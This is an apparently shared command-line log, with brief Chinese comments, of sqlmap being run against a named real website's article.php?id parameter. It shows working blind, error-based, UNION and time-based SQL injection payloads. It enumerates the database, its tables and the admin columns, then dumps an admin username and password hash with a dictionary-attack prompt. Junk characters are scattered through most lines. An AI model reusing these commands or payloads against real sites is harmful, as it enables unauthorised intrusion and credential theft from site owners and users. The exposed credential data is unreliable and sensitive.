D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 d% R; H- e* y4 E$ s& lms "Mysql" --current-user /* 注解:获取当前用户名称8 ^% R% e7 O8 s. s
sqlmap/0.9 - automatic SQL injection and database takeover tool: n- }3 ]+ x+ y! @: P8 N
http://sqlmap.sourceforge.net starting at: 16:53:54# P K+ A, r+ `) H, k
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, v3 p# t9 x6 P7 U
session file
) S0 Q- z$ Y9 e8 S7 C& f. H[16:53:54] [INFO] resuming injection data from session file0 G/ V% X. q) j' B" V4 g: G& H( C
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ u7 t- r* ]7 v[16:53:54] [INFO] testing connection to the target url" u& F/ i" L+ {: K7 @
sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 T$ b# M0 s* s' b# I8 q# r/ |
sts:
$ D8 Y+ Y9 m5 g& h$ r---7 `9 B. G: ^- E# [6 A
Place: GET, y# F" D8 p2 T4 c
Parameter: id
/ y0 |3 @6 u9 E, N7 Z Type: boolean-based blind( s3 s: J$ `6 f, S' ?3 s
Title: AND boolean-based blind - WHERE or HAVING clause
~2 m9 x( r6 D) b% x- D Payload: id=276 AND 799=799# }$ ?9 O$ ^: k
Type: error-based( R- w3 k( u. F4 _. d, t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 v6 u4 U6 Z1 s k! z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 m- T7 D& u; W9 o
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- |* S _- V/ G* A$ B* z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) X E0 j) j" B
Type: UNION query& q8 ]! A+ \3 Y: Q$ T- ^+ F" B
Title: MySQL UNION query (NULL) - 1 to 10 columns, z9 D: U3 @, m7 r+ k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 d( v2 L" k, i e' e
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' p; V4 [: p& r
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' E* K, W/ h3 x, F+ S# x Type: AND/OR time-based blind, i H6 F( ]* q9 v
Title: MySQL > 5.0.11 AND time-based blind
) A" A: p1 o2 i/ n4 j Payload: id=276 AND SLEEP(5)" e. `9 D9 N& k' [! v- m
---
; M2 a& N6 f1 p; O) S[16:53:55] [INFO] the back-end DBMS is MySQL# z7 ~0 v0 P& Z- `6 ~% w
web server operating system: Windows( ~, b( W" w v. }6 r F
web application technology: Apache 2.2.11, PHP 5.3.0
* [9 _- @& q, r# Q" j4 Y9 sback-end DBMS: MySQL 5.0
, @5 ]5 C9 B2 j8 ~! v" m7 {, |, m, d[16:53:55] [INFO] fetching current user
8 d: A3 ~- h7 xcurrent user: 'root@localhost' 9 L: u, i6 }2 u( R0 [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou ^2 M: _* L. v. ?* G, }
tput\www.wepost.com.hk' shutting down at: 16:53:58
+ a9 R. r* Z2 V( y+ P9 V" A G
4 }1 N6 H6 r9 l# }+ J4 e" P0 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
( N# M6 A8 J! ]6 ~8 r" ums "Mysql" --current-db /*当前数据库- v1 v4 z- o' x O$ D
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 m4 c9 q/ k5 }" ~' a http://sqlmap.sourceforge.net starting at: 16:54:169 Z9 N, b1 P7 A; X! L
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( N$ R* k2 l* N session file1 ], M" O( P( F# E( v% s1 n Y% B5 H
[16:54:16] [INFO] resuming injection data from session file
* c0 _/ ~* M; T8 T% z0 ^$ T[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ D. t& K; o, T1 x, ~4 `[16:54:16] [INFO] testing connection to the target url
3 @0 }1 `& K: G5 vsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 a6 t- k: l8 }- ?" U% `0 a
sts:7 u7 b4 p% r4 I! \ L! C4 E6 v
---# t1 z0 k+ V; }+ m) C7 j
Place: GET
2 n& K5 ^8 T5 f: |Parameter: id
, B2 }. Z" @$ c) m) W- L$ r Type: boolean-based blind
) b1 ~6 N$ p% P0 T Title: AND boolean-based blind - WHERE or HAVING clause
3 D B J( W# I1 B0 b* Z) y Payload: id=276 AND 799=799! F& b- z3 [+ [" K+ w2 _
Type: error-based
' a% n1 D6 |$ F( q7 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ {; d! k% T7 K2 Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( V) h: d& W. M' {0 X2 x- o4 ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& ~# i7 U0 s! }4 v2 ?2 K' q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 C4 C, V% m. b; B8 U b
Type: UNION query* N4 H! M1 ?5 \& @) C& q; s& ^) E5 r6 S
Title: MySQL UNION query (NULL) - 1 to 10 columns8 O* W+ E5 A" D& Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" g- m1 A7 Y% x+ F w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 I7 a C2 H! u* f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: G4 h# g) s! q4 O/ U
Type: AND/OR time-based blind7 i+ s$ n, | o9 b# k
Title: MySQL > 5.0.11 AND time-based blind
: P9 x4 y; S4 g4 ` Payload: id=276 AND SLEEP(5)
7 O! L6 B+ b- Q---
2 g! ^" X$ R) X. ^5 I3 L[16:54:17] [INFO] the back-end DBMS is MySQL
) K$ W2 R' Q7 C7 kweb server operating system: Windows
8 E( B; L& x: yweb application technology: Apache 2.2.11, PHP 5.3.0& W( j; |4 O- M" g7 P
back-end DBMS: MySQL 5.0, K: d7 `( j( w$ V( s4 ^5 R
[16:54:17] [INFO] fetching current database
4 _3 |4 r0 o/ b9 J( b4 y7 _current database: 'wepost', X3 T1 L- D A; ?. T# B" v6 j& z4 Y
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. N) q' N+ j. l/ f* w: ntput\www.wepost.com.hk' shutting down at: 16:54:18
$ h4 O7 C! M; o2 V7 I9 S$ mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& Q* E. ]1 Y& `8 M2 mms "Mysql" --tables -D "wepost" /*获取当前数据库的表名, D# e. B) P4 w, }, A# t5 Q; U
sqlmap/0.9 - automatic SQL injection and database takeover tool, H1 A' l) B: W6 Z4 l
http://sqlmap.sourceforge.net starting at: 16:55:250 ?, e+ ~# b" U
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ d- |. N9 d8 H/ o! y
session file
* Q( b% ?+ W3 U H. J5 x4 G$ n[16:55:25] [INFO] resuming injection data from session file
/ _. j* W5 | T+ X. L# b! g: L1 X, A[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ V9 X1 j$ h& p- g5 Q0 V9 T$ J
[16:55:25] [INFO] testing connection to the target url
0 { u2 I% e: t( Csqlmap identified the following injection points with a total of 0 HTTP(s) reque6 N8 F, N* R! m
sts:
4 Q5 i. c7 T8 t" l; L---( ^, B! J" j+ [7 B$ P' U
Place: GET7 P9 U. m: U; H* \8 o3 {
Parameter: id
! J5 _7 {. B8 v/ O* } Type: boolean-based blind
; q9 J9 D9 I: M/ ~ Title: AND boolean-based blind - WHERE or HAVING clause4 I1 `& L$ E( n# ~' i' r6 y
Payload: id=276 AND 799=799
2 ], b3 Q- {& J! R! j) P Type: error-based
; Q- v3 \0 Y" G3 D9 h% i* S- i/ @ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 h+ c+ l& R9 ~6 P+ E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: O/ i, u8 g+ G, C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* u" r7 {0 a( U1 C5 f v4 t
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ ]3 t" P; I# k0 Q; { Type: UNION query9 d+ d0 F$ ~2 ^: g- s2 M( `
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 Y; Z! E H8 I/ c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 w8 x# X4 r) ^1 l) [: D$ z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ x9 P$ }) T7 u; W4 V1 b
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( s e6 I9 X" [% d Type: AND/OR time-based blind- C) v% w2 `4 A( x
Title: MySQL > 5.0.11 AND time-based blind9 ]+ \! [; m# _( n' v, t
Payload: id=276 AND SLEEP(5)
! x/ N" G& E, H2 D, y---! f/ E' A; N! G. Z0 }
[16:55:26] [INFO] the back-end DBMS is MySQL2 K1 G" E7 K8 d1 e7 f0 J
web server operating system: Windows$ C; ~+ ?: r. a& M+ z+ Q
web application technology: Apache 2.2.11, PHP 5.3.0* N2 n; H" u' l# b9 X( O( w5 v: }
back-end DBMS: MySQL 5.0
7 S0 g, f: }1 L6 u( @$ ~, L; J[16:55:26] [INFO] fetching tables for database 'wepost'
6 x, T3 ?- O$ j) r9 k6 e1 d B[16:55:27] [INFO] the SQL query used returns 6 entries+ s0 c# U3 n0 o2 E
Database: wepost
e7 o- g9 Y' m[6 tables]3 g7 K5 r% n1 v( M
+-------------+; e: W- {9 U0 f* m) x
| admin |: b% r1 Z( o4 G0 |& s
| article |. w* x& }1 i9 g, Q
| contributor |
2 z3 Q9 F0 Z! ^| idea |
" V( o( H9 e) K8 k. F+ ?1 l| image |/ x- j7 w4 ~1 O( i* A( p
| issue |9 F- w$ @+ w$ x' I
+-------------+
+ l# g6 k! D K[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
8 D1 n" E6 z6 Y6 {1 jtput\www.wepost.com.hk' shutting down at: 16:55:333 i0 v: |3 }" a7 d Q8 h: T
t. K" q2 ]' k% `
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. Q1 _4 v2 L8 Z- vms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名0 a6 U8 L0 o8 q# N
sqlmap/0.9 - automatic SQL injection and database takeover tool
1 ^0 O- Q2 | l6 m http://sqlmap.sourceforge.net starting at: 16:56:06
% A# M" f5 i( `+ d0 B, `sqlmap identified the following injection points with a total of 0 HTTP(s) reque: l5 m% k3 g( w0 j& N- V
sts:9 g' j! H N7 Z
---! r# v/ `- _2 H8 l' o; W, A* w
Place: GET& J# N- L/ ]. P' r) ~6 I+ F( J2 m
Parameter: id
4 y) `" C+ T& Z) t Type: boolean-based blind
7 S. }% K" f, j0 z) n) q Title: AND boolean-based blind - WHERE or HAVING clause4 [9 H9 N* h! F; C% C9 X$ Y% y5 ?
Payload: id=276 AND 799=799
* `3 n+ s: C ] Type: error-based) {% l9 T, p O" L6 ^6 d6 t9 U4 W
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 V1 h, W* c& v* Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' e+ k- c2 p& S% I; q3 D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% a" f: e" N5 _1 s; w1 Q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); i+ j; u$ ?. N1 C3 ]# ]7 n
Type: UNION query* M. S% O4 a# l8 f" \7 s
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 d4 q& H& t5 I* b( ^; G" k Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! Z+ K" U) R- j; A g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# z% r7 z2 l- } NCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ E( X) ^5 j( d* _
Type: AND/OR time-based blind* X/ W) x4 I& R$ f. g- I/ G5 j
Title: MySQL > 5.0.11 AND time-based blind
$ d7 k- B8 h- Y, E% g Payload: id=276 AND SLEEP(5), q- N1 A o) b+ B$ H) e
---
6 K7 l, J5 P7 U/ L T: H$ x( lweb server operating system: Windows
1 n4 j, c8 ?4 O C5 d2 _: Vweb application technology: Apache 2.2.11, PHP 5.3.0: w! E e4 F" Y
back-end DBMS: MySQL 5.0( @' o ^; i! x6 Z( n+ ?, s* [. b
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: S Y6 O: o0 Rssion': wepost, wepost
6 U( U5 {$ |; o8 v! j) Y' d5 aDatabase: wepost
3 Z! R) S# Q5 Y9 k* O% W' KTable: admin- u$ q g* n$ g/ f
[4 columns]
0 y& d0 b9 e5 `+ C5 Z3 }8 Y6 T3 i8 N3 n+----------+-------------+9 X- O' B( {3 B, b
| Column | Type |1 {3 `+ s! d2 |! j7 E) n4 h( x5 L
+----------+-------------+
0 Q0 e! O9 }# N| id | int(11) |
0 {* ~8 x( q7 _2 J, S) L% s" k: i| password | varchar(32) |
' W) \5 @9 y8 e& e| type | varchar(10) |
9 n6 g8 z% z% }+ o! P| userid | varchar(20) |
, G; o) g8 s, @ C) l+----------+-------------+
. n+ V* w' m9 @8 g+ q shutting down at: 16:56:19
9 V N" ?: |% A( \; I G6 M o, N6 q8 N7 g* S$ E
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 ?+ ?0 {5 y7 q: f# n9 cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容2 q3 q) p! q/ z) G5 |4 P* H
sqlmap/0.9 - automatic SQL injection and database takeover tool
4 F4 C: s- ^; N% s http://sqlmap.sourceforge.net starting at: 16:57:14
* p8 E, U. s, z4 B7 C% V9 U0 Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque7 z% F7 _# h" g) r$ h1 I9 o
sts:
- ]$ |: i# C" v/ E- J( d---
$ m( d# x$ _9 T; lPlace: GET
5 V5 e' `* Y( V8 fParameter: id
# u3 B5 u4 g4 C+ z. ~ Type: boolean-based blind" q1 _& P9 p$ v( N$ L, }
Title: AND boolean-based blind - WHERE or HAVING clause
. E. }! d9 y' G3 o- m* G/ Q- F Payload: id=276 AND 799=799
: P% S1 n! L" i4 w- e" [$ T Type: error-based- i0 I$ S5 T* B- D/ }' m
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ v# k4 S3 O1 ?# t8 b) F4 k# j
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* o; Q8 N5 T6 ]5 D3 f& q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! @4 u- E% [' u. a; I- o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
N. ~: T, b5 d7 V Type: UNION query
4 N1 X) I7 @& u K/ l7 U i# L Title: MySQL UNION query (NULL) - 1 to 10 columns9 I. ]" N `3 x* |! P
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- P6 t% x- P* t) p; }7 e. r
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; h& t1 L. c; Q8 p, z; L. ~' v5 ]0 Z) s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 @; H, z. ^) n; F Type: AND/OR time-based blind+ b2 C3 b/ P2 |9 g L
Title: MySQL > 5.0.11 AND time-based blind/ `1 I2 p. R7 s- _ X, P
Payload: id=276 AND SLEEP(5)
7 M4 l- s. k- ^7 \3 I% S---
- {! h I# ]" g* f! `web server operating system: Windows
& e7 q" @9 \. p# W. D: Iweb application technology: Apache 2.2.11, PHP 5.3.0
8 c+ }4 w& _2 x( Z$ z6 kback-end DBMS: MySQL 5.0% u# K: ?4 ]% L$ x
recognized possible password hash values. do you want to use dictionary attack o7 u0 ^* ?! ]+ b$ I
n retrieved table items? [Y/n/q] y
/ T2 x4 |9 A- G! m9 @, ^: Iwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
. a7 a( b H8 {. ido you want to use common password suffixes? (slow!) [y/N] y2 T$ S. C0 R* |" `! U1 q4 m8 F
Database: wepost+ V$ c7 {7 @. G, p
Table: admin
U# _7 {2 |) i& V+ a[1 entry]
7 {0 G9 @* D* W& k( O" p. y+----------------------------------+------------+
( r! l- S/ u3 g/ S ~# b$ \0 i9 M; w| password | userid |. c& K- [) n# J9 z5 Q
+----------------------------------+------------+0 A, L o4 \3 s% H! r
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
8 N& x. ^" O* ]0 `+----------------------------------+------------+; |: t: K$ _4 l9 l
shutting down at: 16:58:140 z* J& F X3 M2 z) r
" W: M) K b4 r5 g
D:\Python27\sqlmap> |